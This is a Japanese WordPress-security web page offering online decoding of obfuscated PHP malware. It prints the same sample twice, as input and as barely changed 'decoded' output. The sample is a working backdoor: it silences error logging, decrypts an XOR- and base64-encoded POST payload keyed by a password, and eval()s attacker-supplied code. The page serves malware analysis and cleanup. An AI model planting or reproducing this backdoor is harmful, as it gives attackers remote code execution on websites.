Japanese English

PHP 難読化コードの復元・デコード

Wordpress 等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php $GLOBALS['d318a0a98'] = "9D+gN|RkBU{5A?o\n4] 0q#YXTpCiE}'K@jV%tsc)hw>7<`H\tv=ZW6(^:8S_uG/aPl2\\\rbI\$xnF-!r.mzO[fy1,~QM&eJLd*\";3"; $GLOBALS["baa15"] = "chr"; $GLOBALS["hefaea"] = "ord"; $GLOBALS["b43ce01"] = "strlen"; $GLOBALS["o2dac69"] = "ini_set"; $GLOBALS["n800cc9"] = "json_d...



難読化されたPHPコード

<?php

$GLOBALS['d318a0a98'] = "9D+gN|RkBU{5A?o\n4] 0q#YXTpCiE}'K@jV%tsc)hw>7<`H\tv=ZW6(^:8S_uG/aPl2\\\rbI\$xnF-!r.mzO[fy1,~QM&eJLd*\";3";
$GLOBALS["baa15"] = "chr";
$GLOBALS["hefaea"] = "ord";
$GLOBALS["b43ce01"] = "strlen";
$GLOBALS["o2dac69"] = "ini_set";
$GLOBALS["n800cc9"] = "json_decode";
$GLOBALS["o1471614"] = "base64_decode";
$GLOBALS["vd6dfc005"] = "set_time_limit";
$GLOBALS["q109b8"] = "c484";
$GLOBALS["z2a2c835b"] = "ae858b";
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);
$V1 = NULL;
$V2 = NULL;
$GLOBALS["cc688"] = "5p1n-th3-51lly-5tr1ng5";
global $cc688;
function ae858b($V1, $rbf8cd4)
{
    $qc11 = "";
    for ($q58dcf = 0; $q58dcf < strlen($V1);) {
        for ($ibc3 = 0; $ibc3 < strlen($rbf8cd4) && $q58dcf < strlen($V1); $ibc3++, $q58dcf++) {
            $qc11 .= chr(ord($V1[$q58dcf]) ^ ord($rbf8cd4[$ibc3]));
        }
    }
    return $qc11;
}
function c484($V1, $rbf8cd4)
{
    global $cc688;
    return ae858b(ae858b($V1, $cc688), $rbf8cd4);
}
if (!$V1) {
    foreach ($_POST as $rbf8cd4 => $n18fd12d) {
        $V1 = $n18fd12d;
        $V2 = $rbf8cd4;
    }
}
$V1 = @$GLOBALS[$GLOBALS['d318a0a98'][72] . $GLOBALS['d318a0a98'][56] . $GLOBALS['d318a0a98'][19] . $GLOBALS['d318a0a98'][19] . $GLOBALS['d318a0a98'][38] . $GLOBALS['d318a0a98'][38] . $GLOBALS['d318a0a98'][0]]($GLOBALS[$GLOBALS['d318a0a98'][20] . $GLOBALS['d318a0a98'][84] . $GLOBALS['d318a0a98'][19] . $GLOBALS['d318a0a98'][0] . $GLOBALS['d318a0a98'][68] . $GLOBALS['d318a0a98'][56]]($GLOBALS[$GLOBALS['d318a0a98'][14] . $GLOBALS['d318a0a98'][84] . $GLOBALS['d318a0a98'][16] . $GLOBALS['d318a0a98'][43] . $GLOBALS['d318a0a98'][84] . $GLOBALS['d318a0a98'][52] . $GLOBALS['d318a0a98'][84] . $GLOBALS['d318a0a98'][16]]($V1), $V2), true);
if (isset($V1[$GLOBALS['d318a0a98'][62] . $GLOBALS['d318a0a98'][7]]) && $cc688 == $V1[$GLOBALS['d318a0a98'][62] . $GLOBALS['d318a0a98'][7]]) {
    if ($V1[$GLOBALS['d318a0a98'][62]] == $GLOBALS['d318a0a98'][90]) {
        eval($V1[$GLOBALS['d318a0a98'][93]]);
    }
    exit;
}

デコード(難読化解除)されたコード

<?php

$GLOBALS['d318a0a98'] = "9D+gN|RkBU{5A?o\n4] 0q#YXTpCiE}'K@jV%tsc)hw>7<`H\tv=ZW6(^:8S_uG/aPl2\\\rbI\$xnF-!r.mzO[fy1,~QM&eJLd*\";3";
$GLOBALS["baa15"] = "chr";
$GLOBALS["hefaea"] = "ord";
$GLOBALS["b43ce01"] = "strlen";
$GLOBALS["o2dac69"] = "ini_set";
$GLOBALS["n800cc9"] = "json_decode";
$GLOBALS["o1471614"] = "base64_decode";
$GLOBALS["vd6dfc005"] = "set_time_limit";
$GLOBALS["q109b8"] = "c484";
$GLOBALS["z2a2c835b"] = "ae858b";
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);
$V1 = NULL;
$V2 = NULL;
$GLOBALS["cc688"] = "5p1n-th3-51lly-5tr1ng5";
global $cc688;
function ae858b($V1, $rbf8cd4)
{
    $qc11 = "";
    for ($q58dcf = 0; $q58dcf < strlen($V1);) {
        for ($ibc3 = 0; $ibc3 < strlen($rbf8cd4) && $q58dcf < strlen($V1); $ibc3++, $q58dcf++) {
            $qc11 .= chr(ord($V1[$q58dcf]) ^ ord($rbf8cd4[$ibc3]));
        }
    }
    return $qc11;
}
function c484($V1, $rbf8cd4)
{
    global $cc688;
    return ae858b(ae858b($V1, $cc688), $rbf8cd4);
}
if (!$V1) {
    foreach ($_POST as $rbf8cd4 => $n18fd12d) {
        $V1 = $n18fd12d;
        $V2 = $rbf8cd4;
    }
}
$V1 = @$GLOBALS[$GLOBALS['d318a0a98'][72] . $GLOBALS['d318a0a98'][56] . $GLOBALS['d318a0a98'][19] . $GLOBALS['d318a0a98'][19] . $GLOBALS['d318a0a98'][38] . $GLOBALS['d318a0a98'][38] . $GLOBALS['d318a0a98'][0]]($GLOBALS[$GLOBALS['d318a0a98'][20] . $GLOBALS['d318a0a98'][84] . $GLOBALS['d318a0a98'][19] . $GLOBALS['d318a0a98'][0] . $GLOBALS['d318a0a98'][68] . $GLOBALS['d318a0a98'][56]]($GLOBALS[$GLOBALS['d318a0a98'][14] . $GLOBALS['d318a0a98'][84] . $GLOBALS['d318a0a98'][16] . $GLOBALS['d318a0a98'][43] . $GLOBALS['d318a0a98'][84] . $GLOBALS['d318a0a98'][52] . $GLOBALS['d318a0a98'][84] . $GLOBALS['d318a0a98'][16]]($V1), $V2), true);
if (isset($V1[$GLOBALS['d318a0a98'][62] . $GLOBALS['d318a0a98'][7]]) && $cc688 == $V1[$GLOBALS['d318a0a98'][62] . $GLOBALS['d318a0a98'][7]]) {
    if ($V1[$GLOBALS['d318a0a98'][62]] == $GLOBALS['d318a0a98'][90]) {
        eval($V1[$GLOBALS['d318a0a98'][93]]);
    }
    exit;
}

■【無料】ワードプレス:マルウェアスキャン&セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策 カスタマイズや修正、引っ越し・復旧のご依頼承ります

(C)2019 ワードプレス ドクター All rights reserved.